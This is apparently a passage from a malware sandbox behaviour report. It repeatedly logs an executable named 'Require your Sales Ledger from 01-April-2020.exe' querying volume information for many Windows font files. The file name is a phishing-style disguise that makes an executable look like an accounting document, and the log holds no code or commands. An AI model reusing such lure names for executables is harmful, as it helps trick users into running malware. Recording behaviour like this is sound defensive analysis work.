Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
